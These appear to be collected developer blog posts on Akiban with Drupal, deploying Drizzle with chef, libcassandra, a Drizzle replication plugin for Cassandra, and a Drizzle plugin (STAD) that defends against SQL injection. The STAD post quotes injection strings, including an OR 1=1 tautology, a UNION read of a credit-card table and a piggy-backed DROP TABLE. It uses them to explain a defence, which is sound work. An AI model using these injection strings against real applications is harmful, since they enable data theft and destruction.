Drupal 6 does not have a database abstraction layer so it is not as easy to integrate Akiban in this case. With Drupal 6, we do not attempt to run all of Drupal on Akiban. What we have done with our existing customers who use Drupal 6 is to send certain problem queries to Akiban (running in our MySQL replication configuration) and everything else to MySQL. The Akiban Server speaks the PostgreSQL protocol as I discussed before. Hence, for Drupal 6, we use the PostgreSQL database driver to talk to Akiban.

Since Drupal 6 does not support speaking to multiple different database backends at the same time, we apply a patch to get started. Basically, this patch allows connections to be open to both an existing MySQL server and the Akiban Server at the same time. It could be used to do the same with a PostgreSQL database as well.

Once that patch is applied, to send a query to Akiban, the active database connection is set to Akiban and a query is fired off for the Akiban Server to execute. The following code snippet shows an example.

if ($this->use_akiban) {
   db_set_active('akiban');
   $result = db_query_range($query, 
                            $args, 
                            $offset, 
                            $this->pager['items_per_page']);
}
db_set_active('default')
if (! $result) { /* if Akiban failed go to regular MySQL */
   $result = db_query_range($query, 
                            $args, 
                            $offset, 
                            $this->pager['items_per_page']);
}

As can be seen in the code above, its also possible to detect if the query failed against Akiban and re-issue it against MySQL.

When deployed in this configuration, connection details for the Akiban Server is specified in the settings.php file for a Drupal site.

$db_url = array(
  "default" => "mysql://drupal:drupal@mysql_hostname/drupal_schema",
  "akiban"  => "pgsql://drupal:drupal@akiban_hostname:15432/drupal_schema"
);

We’ve also done some work with clients where we have made patches to the Views module for Drupal. These patches allow a client to send the queries generated by a specific view to an Akiban Server.

Taken together, this makes it quite easy for us to work with Drupal 6 and send problematic queries to Akiban.

Akiban Server Progress with Drupal 7

2012-05-14T00:00:00-07:00

The call for papers for DrupalCon Munich closed on Friday and I submitted a session related to the work I’m doing on developing a database module for the Akiban Server with Drupal 7. That work has not been open sourced yet but will be before August. We also plan on open sourcing and releasing the Akiban Server for public download by August as well. The end result of this work will be a database driver for the Akiban Server that will allow Drupal 7 to run on Akiban.

In this post, I wanted to briefly show the type of results I’ve been seeing from running Drupal on Akiban. To do this, I constructed a simple view using the Views module and benchmarked the query that resulted from this view.

Environment Setup

I also created an AMI from the running instance after all the steps outlined were performed. This AMI has MySQL 5.6 installed along with Drupal 7.12 and data generated with drush.

The Akiban AMI cannot be made available for general download yet since we have not open-sourced our stack as of this time. Once our stack has been open-sourced I will update this post with a link to an AMI that can be downloaded. However, if you are interested in seeing the results here for yourself, feel free to contact me and I should be able to grant access to an EC2 instance for testing.

Data Generation

I used drush and the devel modules to generate data so the view would be operating on some data. I generated the following data:

users	50000
tags	1000
vocabularies	5000
menus	5000
nodes	100000
max comments per node	10

View and SQL Query

I created a simple view that filters and sorts on content criteria. A screenshot of my view construction page can be seen here.

The resulting SQL query that gets executed by this view is:

SELECT DISTINCT node.title                            AS node_title, 
                node.nid                              AS nid, 
                node_comment_statistics.comment_count AS 
                node_comment_statistics_comment_count, 
                node.created                          AS node_created 
FROM   node node 
       INNER JOIN node_comment_statistics node_comment_statistics 
         ON node.nid = node_comment_statistics.nid 
WHERE  (( ( node.status = '1' ) 
          AND ( node.comment IN ( '2' ) ) 
          AND ( node.nid >= '111' ) 
          AND ( node_comment_statistics.comment_count >= '2' ) ))
ORDER  BY node_created ASC 
LIMIT  50 offset 0

Performance Comparison

The response time of the query in Akiban versus MySQL is shown below.

As seen in the image above, Akiban can execute the query in question in 5 ms or less whereas MySQL consistently takes 1200 ms to execute the query. In the next section I’ll go into details of how Akiban executes this query.

Secondly, numbers were obtained using the mysqlslap benchmark tool from MySQL to demonstrate how Akiban performs versus MySQL with varying degrees of concurrency.

MySQL Execution Plan

Using Maatkit to visualize the MySQL execution plan, we get:

JOIN
+- Filter with WHERE
|  +- Bookmark lookup
|     +- Table
|     |  table          node_comment_statistics
|     |  possible_keys  PRIMARY,comment_count
|     +- Unique index lookup
|        key            node_comment_statistics->PRIMARY
|        possible_keys  PRIMARY,comment_count
|        key_len        4
|        ref            drupal.node.nid
|        rows           1
+- Table scan
   +- TEMPORARY
      table          temporary(node)
      +- Filter with WHERE
         +- Bookmark lookup
            +- Table
            |  table          node
            |  possible_keys  PRIMARY,node_status_type
            +- Index scan
               key            node->node_created
               possible_keys  PRIMARY,node_status_type
               key_len        4
               rows           100

MySQL chooses to start from the node table and scans an index on the created column. A temporary table is then created in memory to store the results of this index scan. The items stored in the temporary table are then processed to eliminate duplicates (for the DISTINCT). For each distinct row in the temporary table, MySQL then performs a join to the node_comment_statistics table by performing an index lookup using its primary key.

Akiban Execution Plan

The tables involved in the query fall into a single table group in Akiban - the node group. Grouping is explained by our CTO in this post and that post includes a grouping for Drupal where you can see the node group. For this query, it means all joins within the node group are executed with essentially zero cost. It also allows for the creation of Akiban group indexes. A group index is an index that can span multiple tables along a single branch within a table group.

A covering group index for this query is:

CREATE INDEX cvr_gi ON node
(
  node.status,
  node.comment,
  node.created,
  node.nid,
  node_comment_statistics.comment_count,
  node_comment_statistics.nid,
  node.title
) USING LEFT JOIN

Notice that the node.created column is included in this index so a sort could be avoided.

The other large advantage Akiban brings when executing this query is the query optimizer is intelligent enough to determine that the DISTINCT is not required in the query due to the 1-to-1 mapping between node and node_comment_statistics and the fact that an INNER JOIN is being performed between these 2 tables.

Limit_Default(limit=50: project([Field(6), Field(3), Field(4), Field(2)]))
  project([Field(6), Field(3), Field(4), Field(2)])
    Select_HKeyOrdered(Index(cvr_gi(BoolLogic(AND -> Field(3) >= Literal(111), Field(4) >= Literal(2) -> BOOL))
      IndexScan_Default(Index(cvr_gi(>=UnboundExpressions[Literal(1), Literal(2)],<=UnboundExpressions[Literal(1), Literal(2)]))

The above execution plan is in the Akiban format. In this format, you read the plan like a tree so we start from the leaf nodes. The above plan starts with a scan of the cvr_gi index using the node.status and node.comment predicates. It then filters rows from this scan (the Select_HKeyOrdered operator performs this filtering) before limiting the results to the size of the result set requested.

Conclusion

To wrap up, I briefly showed some of the performance benefits we are seeing when running Drupal 7 on the Akiban Server. In the not too distant future, we will be open sourcing our stack here at Akiban and providing downloads of the Akiban Server. I will also be making the database driver for the Akiban Server for Drupal 7 available for download on drupal.org once its complete.

If you are interested in trying this out yourself or want to verify the results before this work becomes publically available, feel free to contact me and I should be able to set you up with access to an EC2 instance so you try if for yourself.

Deploy Drizzle on EC2 with chef

2011-04-07T00:00:00-07:00

This post is a tutorial on how to deploy Drizzle on an EC2 instance using chef and the Opscode Chef platform. The tutorial is specifically targetted at Ubuntu platforms. In particular, the procedures outlined here have only been tested on Ubuntu 10.04. It is expected however that the instructions here should apply on other Ubuntu versions with minimal modifications needed.

The Opscode Platform

In this article, we'll use the Opscode platform since it provides an easy way for anyone to get started with chef. If you are a new user, proceed to sign up for a new account. Once you are signed up, the next step is to create a new organization. For this article, I'm going to create an organization named drizzle-test. Once your organization is created, you should see the organization in your list of organizations when you click on the Organizations link at the top right of the opscode console. My view looks like (you should be able to click on the image to see a larger version):

Configure AWS

An assumption made in this article is that you have an AWS account. If you don't, signing up is relatively straightforward.

There are a few items that need to be configured for EC2 that we need to do to make our lives easier before starting with chef. Amazon blocks all incoming traffic to EC2 instances by default. SSH is used by chef to access and bootstrap a newly created instance. We want to allow SSH traffic to our EC2 instances and for this article, I want to permit traffic to the drizzle port (default drizzle port is 4427) as well. This is accomplished using the AWS console. We need to configure Security Groups. You can either create a new security group and modify the default security group. For this article, I'll create a new security group named drizzle and add the appropriate rules. After creating the group and adding the rules, the security group details should look like:

I'll also create a new key pair in the AWS console specifically for this article. I'm going to give this key pair the name drizzle. After creating the key pair, I copy the downloaded private key to my SSH folder and update permissions on the key:

mv ~/Downloads/drizzle.pem ~/.ssh/
chmod 600 ~/.ssh/drizzle.pem

Install chef

To install chef on Ubuntu is quite straightforward. Opscode maintains an APT repository which I simply need to add to my sources list. In the file /etc/apt/sources.list.d/opscode.list, add (and replace lucid with whatever release you are running):

deb http://apt.opscode.com/ lucid main

Next, I need to add the GPG key:

wget -qO - http://apt.opscode.com/packages@opscode.com.gpg.key | sudo apt-key add -
sudo apt-get update

To install chef, its as simple as installing the chef package:

sudo apt-get install chef

When prompted for the server URL during this package installation, you can leave it blank. We will be configuring this later. You can also stop and disable the chef-client service now if you wish since we will only be using the knife utility in this article. Finally, verify the version you have installed:

knife -v

For this article, the output of the above command needs to be a least 0.9.14

Other packages required for this article are rubygems and git:

sudo apt-get install rubygems git

Once rubygems is installed, there a few gems required for interacting with EC2:

sudo gem install net-ssh net-ssh-multi fog highline

Configure chef

We are now all set to get started. The first thing to do is create a chef repository on your workstation. In this article, I will use git for this:

git clone https://github.com/opscode/chef-repo.git drizzle-chef-repo

Create a .chef directory within this repository. This directory contains all the configuration files for just this repository:

mkdir -p ~/drizzle-chef-repo/.chef

Next, we need to download keys and knife configuration files from the Opscode platform that will be used for interacting with Opscode platform. Keys are needed for both your user and organization on the Opscode Platform. To retrieve your user key (if you did not download it when signing up), click on your username through the console and you will a 'get private key' link on your account page:

After Downloading this key, I need to place it in the configuration directory for the chef repository I am using here:

mv ~/Downloads/posulliv.pem ~/drizzle-chef-repo/.chef

For your organization, click on the 'Regenerate validation key' link and 'Generate knife config' link from the organizations over page as mentioned in the first section of this article. After clicking those 2 links, you will have 2 files: 1) drizzle-test-validator.pem and 2) knife.rb. Move these 2 files into the configuration directory for the chef repository being used for this article:

mv ~/Downloads/drizzle-test-validator.pem ~/drizzle-chef-repo/.chef
mv ~/Downloads/knife.rb ~/drizzle-chef-repo/.chef

From now on, whenever you are in the drizzle-chef-repo directory, the knife utility will connect to the Opscode Platform. To verify this, lets list out the current clients:

posulliv@curragh:~/drizzle-chef-repo$ knife client list
[
  "drizzle-test-validator"
]
posulliv@curragh:~/drizzle-chef-repo$

We need to tell knife about our AWS credentials. This is done by adding the following 2 lines to your knife.rb file in the ~/drizzle-chef-repo/.chef directory:

knife[:aws_access_key_id]     = "Your AWS Access Key"
knife[:aws_secret_access_key] = "Your AWS Secret Access Key"

After adding these credentials I should now be able to list all the EC2 instances associated with my AWS account:

posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
posulliv@curragh:~/drizzle-chef-repo$

Drizzle Cookbook

chef should now be configured to work with your AWS account. The next step is to decide on what roles or recipes you want to apply to an instance you create. Since this article is on drizzle, I'll show how to bootstrap an EC2 instance with drizzle. I have developed a simple drizzle cookbook in a fork of Opscode's official cookbook repository that can be retrieved with git:

cd ~/drizzle-chef-repo
rm -rf cookbooks
git clone git://github.com/posulliv/cookbooks.git

I have opened a pull request for this fork to get merged into Opscode's official repository. Hopefully, it will get merged in soon.

Now we want to upload cookbooks to our chef server. The only cookbook I will upload in this article is the Drizzle cookbook:

cd ~/drizzle-chef-repo
knife cookbook upload drizzle

It is simple to list the cookbooks that have been uploaded so far to your chef server:

posulliv@curragh:~/drizzle-chef-repo$ knife cookbook list
[
  "drizzle"
]
posulliv@curragh:~/drizzle-chef-repo$

Create and Verify EC2 Instance

We are now ready to create an EC2 instance and have it bootstrap itself and install the drizzle GA release! You will see a spew of output when you issue the command below (feel free to use any AMI image or flavor you wish, I just picked one):

knife ec2 server create "recipe[drizzle]" \
--image ami-2d4aa444 \
--flavor m1.small \
--groups drizzle \
--ssh-key drizzle \
--identity-file ~/.ssh/drizzle.pem \
--ssh-user ubuntu

To verify the server is created, first we check in the server list output from EC2:

posulliv@curragh:~/drizzle-chef-repo$ knife ec2 server list
Instance ID      Public IP        Private IP       Flavor           Image            Security Groups  State          
i-5e1ce433       50.17.249.89     10.253.30.159    m1.large         ami-879f70ee     AkibanWeb        running        
i-1bcb4f77       50.16.188.89     10.112.233.119   t1.micro         ami-548c783d     AkibanWeb        running        
i-d6fa10b9       50.17.34.183     10.243.14.15     m1.large         ami-548c783d     AkibanQA         running        
i-98db31f7       50.16.137.154    10.114.246.151   m1.large         ami-548c783d     AkibanQA         running        
i-1e16fc71       174.129.139.237  10.195.205.139   m1.large         ami-548c783d     AkibanQA         running        
i-c03b5caf       50.17.153.76     10.202.253.78    m1.small         ami-2d4aa444     drizzle          running        
posulliv@curragh:~/drizzle-chef-repo$

We should also verify that it is listed as a node:

posulliv@curragh:~/drizzle-chef-repo$ knife node list
[
  "i-c03b5caf"
]
posulliv@curragh:~/drizzle-chef-repo$

Finally, if I log onto the EC2 instance I should be able to connect to drizzle:

posulliv@curragh:~$ ssh -i ~/.ssh/drizzle.pem ubuntu@50.17.153.76
Linux ip-10-116-210-131 2.6.32-305-ec2 #9-Ubuntu SMP Thu Apr 15 04:14:01 UTC 2010 i686 GNU/Linux
Ubuntu 10.04 LTS

Welcome to Ubuntu!
 * Documentation:  https://help.ubuntu.com/

  System information as of Mon Apr 11 23:01:28 UTC 2011

  System load: 0.36             Memory usage: 13%   Processes:       55
  Usage of /:  8.6% of 9.92GB   Swap usage:   0%    Users logged in: 0

  Graph this data and manage this system at https://landscape.canonical.com/
---------------------------------------------------------------------
At the moment, only the core of the system is installed. To tune the 
system to your needs, you can choose to install one or more          
predefined collections of software by running the following          
command:                                                             
                                                                     
   sudo tasksel --section server                                     
---------------------------------------------------------------------

A newer build of the Ubuntu lucid server image is available.
It is named 'release' and has build serial '20110201.1'.
Last login: Mon Apr 11 22:27:04 2011 from 12.43.172.10
ubuntu@ip-10-116-210-131:~$ drizzle
Welcome to the Drizzle client..  Commands end with ; or \g.
Your Drizzle connection id is 9
Connection protocol: mysql
Server version: 2011.03.13 Ubuntu

Type 'help;' or '\h' for help. Type '\c' to clear the buffer.

drizzle>

Conclusion

Hopefully, this tutorial proves useful. I hope to work more on the Drizzle cookbook in the near future and add support for the various plugin types present in Drizzle.

Secondary Indexes with libcassandra in C++

2011-02-27T00:00:00-08:00

Last weekend I updated my high-level C++ client for Cassandra, libcassandra to support a lot of the new features in the 0.7 Cassandra release. In particular, one of the new features is secondary indexes and I wanted to very briefly outline how secondary indexes can be used programatically in libcassandra.

An article by Datastax gives a great overview of secondary indexes. I'm going to use the example in that article here.

The first thing which we must do is create a keyspace and column family. This is accomplished in libcassandra like:

After creating a keyspace and column family for working with, we next want to insert some sample data. I'll use the sample data inserted in the article but instead of inserting it through the CLI, I'll insert it using libcassandra:

Next, to perform the same query as was used in the article, the code looks like:

Currently, the result set is a std::map of row keys to an inner std::map of column names to column values. I plan on adding support for the result to contain more information about each row in the result set in the future.

SQL Injection Prevention in Drizzle

2010-12-05T00:00:00-08:00

SQL injection attacks occur frequently nowadays. While attacks of this nature are completely avoidable when safe programming techniques are used, they still occur in practice.

With this in mind, I developed a plugin for Drizzle named STAD that utilizes the query rewriting plugin interface to prevent SQL injection attacks. The target use case for this plugin is a hosted environment where applications being developed are independent of the database layer i.e. a DBA can not control how a developer chooses to develop their application. Also, I mainly did this as a side-project to demonstrate a use-case for the query rewriting API.

Overview

STAD is a practical protection mechanism that applies the concept of instruction-set randomization to SQL: the SQL standard keywords are modified by appending a random key to them, one that an attacker cannot easily guess. Queries injected by an attacker into a randomized query will be caught since they will not contain the randomization key. The plugin will then just execute a harmless query (for now it is 'SELECT 1') instead of returning any error information to a potential attacker. The security of this approach is dependent on attackers not being able to discover the randomization key. If the key is exposed to an attacker, they will have the ability to inject SQL with the appropriate key appended to keywords.

This solution was first developed in the research paper 'SQLrand: Preventing SQL Injection Attacks'. In their implementation of the idea, a proxy was developed that sat between the application and the database server. Thus, while it was a database independent solution, the overhead of the proxy layer and the introduction of a new component made it impractical.

In drizzle, this funtionality is enabled through the query rewriting API. When the plugin is loaded and a randomization key is specified, all queries issued against the database must contain the correct randomization key or they will not execute correctly. A version of the drizzle command line client comes with the plugin that automatically appends the correct randomization key to SQL keywords. When the plugin is loaded and a randomization key is specified, an administrator is encouraged to use this version of the drizzle command line client.

To get an idea of how the plugin works, I created a simple diagram to illustrate the steps involved in executing a query when the plugin is enabled.

In step (1) in the diagram above, a client driver (in this case ruby which I will link to later) establishes a connection with the server and asks the STAD plugin for the current randomization key. In step (2), this key is returned to the driver (right now it is transferred as plaintext) and stored there for the duration of the connection.

In step (3), an application issues a query which goes through a client driver. This client driver randomizes the query using the randomization key obtained from the STAD plugin in step (2). It is this randomized query that is submitted to the server in step (4). Step (5) occurs before the query is parsed by the drizzle kernel. The STAD plugin de-randomizes the query and if all SQL keywords were randomized with the correct randomization key, it passes the correct query onto the drizzle query execution engine in step (6).

Steps (7) and (8) are simply the returning of a result set to the client driver and application sitting above it.

Attack Examples

In the survey paper 'A Classification of SQL Injection Attacks and Countermeasures', the authors described a number of SQL injection attack types. I'm going to go through a few of these attack types and the examples from the paper and how the STAD plugin can prevent them. For the attack types and examples that go along with them, it assumed that the application is badly written and dynmically builds a SQL query based on user input without any validation of the input data. The query that will be constructed is:

SELECT accounts FROM users WHERE login='name' AND pass='pass' AND pin=pinno

The login, pass, and pin conditions in the WHERE clause are obtained from user input.

Tautologies

The general goal of a tautology-based attack is to inject code in one or more conditional statements so that they always evaluate to true. The consequences of this attack depend on how the results of the query are used within the application.

This attack type has three main goals:

bypass authentication
identify injectable parameters
extract data

An example of this attack would be:

SELECT accounts FROM users WHERE login='' OR 1=1 -- AND pass='' AND pin=

In this example, an attacker has injected a conditional (OR 1=1) that transforms the entire WHERE clause into a tautology and so every row in the users table will be returned.

This attack would be prevented using our approach. Assume for a moment that the randomization key is the string '1234'. In this case, the query issued to the drizzle server would look like:

SELECT1234 accounts FROM1234 users WHERE1234 login='' OR 1=1 -- AND1234 pass='' AND1234 pin=

In this case, the query would not be de-randomized correctly. The STAD plugin would see that the OR keyword has not been randomized with the correct randomization key. Thus, the plugin would detect spurious input and never issue this query against the database.

UNION Query

In union-query attacks, an attacker exploits a vulnerable parameter to change the data set returned for a given query.

The goals of this attack type are:

bypass authentication
extract data

With this attack, an attacker can trick the application into returning data from a table different than the one intended by the developer.

For example, assume there is another table named creditcards in the same schema as the users table. In that case, an attacker could construct a query like:

SELECT accounts FROM users WHERE login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND pass = '' AND pin=

The original query returns an empty set but the second query returns data from the creditcards table if the given account number exists. The result of this depends on the application but it is possible an attacker could exploit this.

With our plugin, this query would look like:

SELECT1234 accounts FROM1234 users WHERE1234 login = ''
UNION
SELECT card_no FROM creditcards WHERE account_num = 4747 -- AND1234 pass = '' AND1234 pin=

As in the tautology attack, this query would never be issued since not all keywords in the query have been randomized with the correct randomization key.

Piggy-Backed Queries

Here, an attacker attempts to inject additional queries into the original query. In this case, an attacker is not trying to modify the original query; instead they are attempting to include new and distinct queries that "piggy-back" on the original query (think little-bobby tables).

The goals of this attack type are:

extract data
add or modify data
perform denial of service
execute remote commands

The database will receive multiple queries when an attack of this type is launched. If successful, an attacker could insert virtually any type of SQL command into the additional queries issued after the original query.

An example of this attack would be:

SELECT accounts FROM users WHERE login = 'bob' AND pass = ''; DROP TABLE users; -- ' AND pin = 1941;

The above attack has the DROP TABLE statement piggy-backed onto the original query. It would drop the users table. Our approach would prevent this plugin a similar way to the previous 2 attack types. The injectde commands would not have been radomized with the correct randomization key and so would be rejected by our plugin. In this case, the first query would be issued but the DROP TABLE statement would never be executed.

Overheads of Our Approach

One question that pops up when using a plugin like this would be what kind of overheads are associated with it. One experiment I performed to measure the overhead of the plugin was to use the oltp test in sysbench at various concurrency levels with the plugin both enabled and disabled. The results for this experiment are shown below:

Its worth noting that this experiment was run on my local laptop so the actual transaction per second numbers are not interesting. All I'm looking to see is what kind of dip in transactions per second I see when the plugin is enabled. We can see that there is definitely a hit taken when the plugin is enabled with the reduction in transactions per second being about 10% across the board.

Installation and Usage

The STAD plugin is maintained on github as a purely out-of-tree drizzle plugin. To download the source, either git or wget can be used:

wget https://github.com/posulliv/stad/tarball/master
git clone git://github.com/posulliv/stad.git

To build and install the plugin, the following is performed:

./config/autorun.sh
./configure --includedir=/path/to/drizzle/root/include --with-libdrizzle-prefix=/path/to/drizzle/root --prefix=/path/to/drizzle/root
make
make install

The above assumes you have drizzle installed somewhere on your system. You just need to point the configure script to that location so it can find the header files it needs.

When starting the drizzled daemon, we need to inform it about the new plugin that we want to load since the plugin is not loaded by default. The extra parameter to pass to drizzled is --plugin-add (this loads the default list of plugins in addition to any plugins given as a parameter) so my drizzled command in my startup script looks like:

start_daemon -p "$PIDFILE" "$DAEMON --chuid $DRIZZLE_USER"  "--datadir=$DATADIR" "--plugin-add=stad"> $LOG 2>&1 &

To verify the plugin is loaded correctly, we can query the MODULES table in the DATA_DICTIONARY schema:

drizzle> select module_author, module_license, module_version
    -> from data_dictionary.modules
    -> where module_name = 'stad';
+----------------------+----------------+----------------+
| module_author        | module_license | module_version |
+----------------------+----------------+----------------+
| "Padraig O Sullivan" | GPL            | "0.2"          | 
+----------------------+----------------+----------------+
1 row in set (0 sec)

drizzle>

Once the plugin is installed, we can use a ruby client for drizzle I've been working with in my spare time. This ruby client is on github as well and it can either be retrieved using git or a tarball can be pulled:

wget https://github.com/posulliv/drizzle-ruby/tarball/master
git clone git://github.com/posulliv/drizzle-ruby.git

Then to install the client, its simply:

sudo rake install

Once the ruby client is installed, we can begin to use it in an application. A simple example of using it is:

The above does nothing interesting but highlights a few interesting points. The client decides whether or not to use SQL randomization for a query based on the connection options given when creating a new connection to the database. Creating the connection object in the example above corresponds directly to steps (1) and (2) in the overview diagram we gave at the beginning of this article.

To issue a query that will be randomized, we must first specify a randomization key to the STAD plugin. Right now, this is done using a global variable so anyone who can connect to your drizzle database and view global variables can see what randomization key is being used. To set the randomization key to '1234', its simply:

drizzle> set global stad_key = '1234';
Query OK, 0 rows affected (0 sec)

drizzle>

After setting the randomization key, every query that issued against the database will now need to be randomized. This obviously becomes a problem if you need to issue queries through the command line client! The solution I use for now is to provide a version of the drizzle CLI named stadclient that takes the randomization key as a parameter. This binary will be installed in the bin directory under your drizzle root when you install the STAD plugin. We invoke it and can issue regular queries again through the CLI:

$ stadclient -k 1234

drizzle> select * from data_dictionary.global_variables where variable_name = 'stad_key'; 
+---------------+----------------+
| VARIABLE_NAME | VARIABLE_VALUE |
+---------------+----------------+
| stad_key      | 1234           | 
+---------------+----------------+
1 row in set (0 sec)

drizzle>

Getting back to the ruby client, queries are issued against drizzle and randomized automatically by the ruby client. The code to issue a query against the server is:

Line 11 in the above code encapsulates steps (3) through (7) in the overview diagram at the beginning of this article. Line 12 actually returns the results to the application and corresponds to step (8) in the diagram.

Conclusions

STAD is a practical protection mechanism against SQL injection attacks. It has relatively low overheads and when used through the ruby client interface I developed, it becomes quite simple to use in a client application with minimal modification. Of course, SQL injection attacks are completely preventable using good programming practices but I believe this plugin provides an extra layer of security in environments where a DBA cannot control how a developer chooses to sanitize their input.

Drupal 7 with Drizzle

2010-07-12T00:00:00-07:00

I wrote an article on the company blog today about how to configure the latest Drupal 7 alpha release to work with Drizzle as the backend database.

Feel free to check it out if you are interested.

Simple Drizzle Replication Plugin for Cassandra

2010-06-01T00:00:00-07:00

This week, I'm giving a talk at Open Source Bridge in Portland on developing replication plugins for Drizzle. This talk will be based on the tutorial that Jay and I gave at the MySQL User's Conference this year. What I want to cover in this article is the process of creating a simple replication plugin that simply applies the replication events that occur in Drizzle to Cassandra.
Lots of the material in this article is directly due to input from Jay and in particular from the presentation Jay put together for our tutorial in April.

Drizzle Architecture & Replication Basics

As is pretty well known at this stage, Drizzle follows a micro-kernel design. Essentially, this means that most features are built as plugins. For example, in Drizzle, authentication, logging, storage engines, etc. are provided as plugins. The kernel is meant to be extremely small in size and provides the basic functionality a database server requires such as a parser, query optimizer, and query executor.
Replication in Drizzle is entirely row-based with the kernel being the marshall of all sources and targets of replicated data. The kernel constructs objects that represent changes made in the server. The objects constructed are of type message::Transaction and the kernel pushes these constructed objects out to replication streams (a replication stream in Drizzle is a pairing of a replicator and an applier).
The Transaction message in Drizzle is the basic unit of work in the replication system which represents a set of changes that were made. We use Google Protocol Buffers for representing these messages. The GPB definition for the Transaction message is contained within the drizzled/message/transaction.proto file within the Drizzle source tree. Jay has previously gone into great detail on the GPB message definitions and I see no point in duplicating the great articles Jay has written so I encourage you to read those if you are interested in knowing more about the GPB message definitions.

Creating a Simple Cassandra Applier

Mainly, what I wanted to do in this article is to go through a simple example to demonstrate the replication API. Please note that the plugin I'm going to cover for this example is extremely simple and probably not very useful. Its main purpose is to serve as an example of how to develop a transaction applier plugin that can apply transactions to a difference database system; in this case Cassandra.
Our Cassandra applier depends on 2 third-party libraries: 1) thrift and 2)libcassandra. libcassandra is a C++ wrapper for the thrift interface to Cassandra that I developed a few months ago to make it easier for me to play with Cassandra when programming in C++. Its not very well tested but suits my purposes just fine.
Given that our plugin depends on some third-party libraries, my plugin.ini file will look like:

And my plugin.ac file will look like:

This takes care of my plugin's dependence on third-party libraries during the compilation process. If these libraries are not present on the system when I compile Drizzle, then this plugin will not be compiled.
As mentioned before, the plugin I am developing is a transaction applier. This means the plugin will be implementing the plugin::TransactionApplier interface. The main function a plugin implementing this interface needs to implement is the apply function: The header file for the CassandraApplier class is defined in a new header file named cassandra_applier.h which contains the class declaration that looks like:

The implementation is contained within the cassandra_applier.cc C++ file. The most interesting function in this file is the plugin's implementation of the apply() function. In the case of the CassandraApplier, this function looks like:

One thing worth mentioned about the above function before delving into its details is that we assume that there is 1 keyspace within Cassandra that we will replicating into. If this keyspace, is not present, the function will fail. This is mainly because this allowed me to develop this plugin pretty quickly. There is really no other reason for that. In reality, a more robust plugin would allow the keyspace to be configurable. Personally, I would prefer to have a way to specify the keyspace a statement should be replicated into specified in the SQL statement so it could be controlled on a per-statement basis. Not a major issue but I wanted to point this out in case anyone was wondering.
Now, the above function first looks at the Transaction message and determines how many Statement messages are contained within it. Next, we loop through all the Statement messages contained within the Transaction message. Depending on the type of the Statement message, we perform a different action. Right now, the plugin only cares about 3 types of Statements: INSERT, UPDATE, and DELETE.
However, the action performed for each action is virtualy identical. First the header for that type is obtained. Next, the table metadata and actual data for the Statement is obtained. We then loop through each field affected by this Statement.
For example, with an INSERT Statement, we loop through each field affected by the INSERT and obtain the field metadata for that field. We use this to obtain the key that will be used for insertion in Cassandra. For this simple plugin, the key used by Cassandra is the primary key of a table. The name of the field is used as a column name in Cassnadra and the value being inserted for that field is used as the value for that column. The name of the table on which the INSERT is happening corresponds to a column family name in Cassandra.
The initialization function for this plugin is pretty straightforward. We allocate memory for a CassandraApplier object and add that object the plugin registry: All the above files I referenced are placed in a directory named cassandra_applier I created in the plugin directory in the lp:~posulliv/drizzle/rep-cassandra branch on Launchpad. To download and compile the plugin, perform the following:

bzr branch lp:~posulliv/drizzle/rep-cassandra
cd rep-cassandra
export CXXFLAGS=-I/usr/local/include/thrift
./config/autorun.sh
./configure --with-cassandra-applier-plugin
make

If any of the third-part libraries required by the plugin are absent, you will see a message informing you of that during the configure stage.
In order to start a Drizzle server from the above branch with the appropriate plugins loaded, I perform the following:

mkdir run
cd run
../drizzled/drizzled --basedir=$PWD \
--datadir=$PWD \
--plugin_add=default_replicator,cassandra_applier \
>> $PWD/drizzle.err 2>&1

To make sure the correct replication stream is enbabled within Drizzle, I can query the data dictionary table Jay created for this purpose:

drizzle> select * from data_dictionary.replication_streams;
+--------------------+-------------------+
| REPLICATOR         | APPLIER           |
+--------------------+-------------------+
| default_replicator | cassandra_applier | 
+--------------------+-------------------+
1 row in set (0 sec)

drizzle>

Next I'll start up my Cassandra cluster that the applier plugin will work with. For reference, I'm using Cassandra 0.7 and the Cassandra cluster I used for this article is configured as follows (the cassandra.yaml file):

Now, to see the plugin in action, consider the following table in Drizzle:

drizzle> create table padraig
    -> (
    ->   a int,
    ->   b varchar(128),
    ->   c varchar(128),
    ->   primary key(a)
    -> );
Query OK, 0 rows affected (0.07 sec)

drizzle>

And assume we perform the following INSERT statements on the table:

drizzle> insert into padraig (a, b) values (1, 'sarah');
Query OK, 1 row affected (0.16 sec)

drizzle> insert into padraig (a, c) values (2, 'nimbus');
Query OK, 1 row affected (0.15 sec)

drizzle> insert into padraig (a, b, c) values (3, 'domhnall', 'tomas');
Query OK, 1 row affected (0.15 sec)

drizzle>

Now, to see what was inserted in Cassandra, we will use the Cassandra CLI interface:

$ ./bin/cassandra-cli 
Welcome to cassandra CLI.

Type 'help' or '?' for help. Type 'quit' or 'exit' to quit.
[default@unknown] connect localhost/9160
Connected to: "Drizzle Example Cluster" on localhost/9160
[default@unknown] use drizzle;
Authenticated to keyspace: drizzle
[default@drizzle] get padraig['1']
=> (column=61, value=sarah, timestamp=1275376031524000)
Returned 1 results.
[default@drizzle] get padraig['2'] 
=> (column=62, value=nimbus, timestamp=1275376057537000)
Returned 1 results.
[default@drizzle] get padraig['3']                  
=> (column=62, value=domhnall, timestamp=1275376211981000)
=> (column=61, value=tomas, timestamp=1275376067097000)
Returned 2 results.
[default@drizzle] quit
$

Conclusions

That's about it for this article on Drizzle replication. If interested in more, feel free to ping the Drizzle mailing list with questions or comments. Parts of replication are still under active development and I know Jay loves to get feedback from people on the replication API in Drizzle.

Up and Running with HadoopDB

2010-05-10T00:00:00-07:00

